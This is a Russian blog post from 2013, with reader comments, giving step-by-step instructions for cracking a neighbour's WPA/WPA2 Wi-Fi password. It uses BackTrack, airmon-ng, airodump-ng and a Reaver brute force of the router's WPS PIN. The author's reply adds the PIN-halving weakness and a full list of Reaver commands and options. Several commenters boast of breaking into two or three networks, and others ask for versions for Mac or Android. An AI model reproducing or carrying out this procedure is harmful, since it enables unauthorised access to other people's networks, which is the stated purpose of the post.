Взлом Wi-Fi Пароля

Дата: 20 марта 2013. Автор: Catchermax. Рубрика: Информационные технологии (IT)

Взлом типа шифрования Wi-fi wpa/wpa2, который очень распространен, у вас же возникало желание воспользоваться запороленным соседским интернетом? Так, следуйте гайду и у вас всё получится.

Источник /

 

Взлом Wi-Fi Пароля

Взлом типа шифрования Wi-fi wpa/wpa2, который очень распространен, у вас же возникало желание воспользоваться запороленным соседским интернетом? Так, следуйте гайду и у вас всё получится.
За пару часов получаем пароль к wi-fi жертвы.
Что нужно для взлома BackTrack 5 R2(http://yadi.sk/d/64Bu1rLX0BKP7) в свою очередь прожигаем образ скачанной системы на диск (Ultra ISO, NERO), включаем ноутбук и переходим в режим BootSetup, и загружаемся с диска.

 

Выбираем первую строчку в меню:

Потом в командной строке набираем команду STARTX открывается графический режим, вводим команду IWCONFIG в терминал:

Затем переводим наш wifi адаптер в AIRMON-NG START WLAN0

Смотрим что выставлено mon0 или mon1 , затем набираем AIRODUMP-NG MON0 (или MON1, смотря какая у вас карта)

Ждём пока сети сканируются , делаем паузу, Ctrl+C выделяем и копируем MAC адрес устройства, которое на первых строчках )из-за соображений качества сигнала)
пишем REAVER -I MON0 -B (здесь должен быть скопированный MAC адрес) -VV .
Пойдут проценты (если остановилось Ctrl+C и опять REAVER -I MON0 -B (вставляем MAC адрес) -VV потом Y). В строке WPA PSK и будет наш долгожданный пароль!

Мой блог находят по следующим фразам

© 2013, blogmega.ru. все права защищены ©

  1. jonix111:

    ввожу reawer-i mon0-b b0:47:7f:db:45:f6-vv пишет что такой команды нет
    С уважением jonix111

    • Catchermax:

      Reaver выполняет прямую атаку на защищенные WiFi точки через PIN-код производителя оборудования, перебирая все возможные комбинации для кода из 8 цифр. Может показаться, что количество вариантов для перебора 8 цифр равняется 10^8 (100 миллионов), однако здесь есть хитрости.. Последняя цифра является контрольной суммой и вычисляется из предыдущих 7 цифр, таким образом вариантов для перебора становится 10^7 (10 миллионов). WPS аутентификация представляет собой не 1 PIN-код, а 2, т.е. PIN-код разделен пополам и проверяется отдельно, что еще больше сужает количество проверяемых значений — 10^4 + 10^3, это означает, что количество комбинаций, которые необходимо проверить, уже не 100 миллионов, и даже не 10 миллионов, а всего 11000. Скорость, с которой Reaver выполняет перебор всех комбинаций ограничена лишь скоростью, с которой роутер может обрабатывать запросы WPS. Некоторые роутеры позволяют проверять по одному PIN-коду в секунду, а некоторые по одному PIN-коду каждые 30 секунд, но по статистике правильны код находится уже на половине перебора. Практика с Reaver Закачиваем последнюю версию с сайта проекта https://code.google.com/p/reaver-wps/downloads/list Reaver поддерживается только на Linux и требует установленных библиотек libpcap и libsqlite3. Устанавливаем $ ./configure $ make # make install Чтобы удалить все установленное/созданной Reaver: # make distclean Использование Reaver Обычно достаточно указать имя интерфейса, запущенного в режиме мониторинга и BSSID целевой точки доступа: # reaver -i mon0 -b 00:01:02:03:04:05 Номер канала и SSID (при условии, что SSID не скрыт) будут автоматически определены самим Reaver, однако их можно задать заранее # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys По умолчанию, если канал меняется, Reaver также будет переключаться на другой канал, но эту функцию можно отключить # reaver -i mon0 -b 00:01:02:03:04:05 —fixed По умолчанию, время ожидания ответа равно 5 секундам. Это время можно задать вручную (минимум 1 секунда) # reaver -i mon0 -b 00:01:02:03:04:05 -t 2 По умолчанию, период задержки между попытками перебора составляет 1 секунду. Это значение может быть также изменено, например, уменьшено до 0 # reaver -i mon0 -b 00:01:02:03:04:05 -d 0 Некоторые точки доступа могут временно блокировать попытки авторизации по WPS на 5 минут или меньше, когда обнаруживают попытки перебора. По умолчанию, когда эта блокировка обнаружена, Reaver будет проверять «разблокировку» каждые 315 секунд (5 минут и 15 секунд) и не продолжит перебор до момента снятия блокировки. Меняем это время вот так (в секундах) # reaver -i mon0 -b 00:01:02:03:04:05 —lock-delay=250 Также рекомендуем повысить уровень детализации выводимой информации, чтобы всегда знать этам проверки и сразу увидеть возможные ошибки # reaver -i mon0 -b 00:01:02:03:04:05 -vv В большинстве случаев не требуется завершать сессию WPS прежде чем пытаться использовать другой PIN, поэтому Reaver не посылает пакетов для их прерывания, но эту функцию можно включить ручную # reaver -i mon0 -b 00:01:02:03:04:05 —eap-terminate Когда происходит 10 ошибок WPS, что может быть следствием перегрузки точки доступа запросами, Reaver может автоматически выжидать время (спать) и затем продолжать работать. Это время простоя можно задать следующим образом # reaver -i mon0 -b 00:01:02:03:04:05 —fail-wait=360

  2. Паша:

    РАБОТАЕТ!!! ХАКНУЛ 3 СЕТИ!!! СПАСИБО!!!

  3. Роман:

    Под хр пойдет прога?

  4. Андрей:

    На мак есть что то похожее а то в командировках пароли все жмут))))

  5. Олег:

    хакнул 2 сети, хотел еще парочку, но при попытке вводе последней команды «reaver -i mon0 -b mac-адрес -vv начинает перечислять каналы 1,2,3,4… и всё на одном месте, так и час было ждал и не изменилось. в чем ничего дело не могу понять?

  6. игорь:

    эта прог пойдет для андроид? если нет то что плсоветуете?

  7. Павел:

    Прошил DVD, при загрузке выводит «boot: » ,никакой картинки нет. Что писать-то?

  8. Павел:

    А, блин, Enter нажать. Трудно было написать, что-ли.

  9. Сергей:

    А если пароль не только из цифр и не 8-и значный, а больше, тогда как быть?
    P.S. Запустил прогу, перебирает по 2% в час (3 seconds/pin), уже 45% проверил, пока результата нет…

  10. Дмитриц:

    а под хр откуда качать не понял?

  11. Timur:

    установил на ноутбук когда ввожу команду iwconfig выдается только

    lo no wireless extension.
    eth0 no wireless extension.

    в чем причина?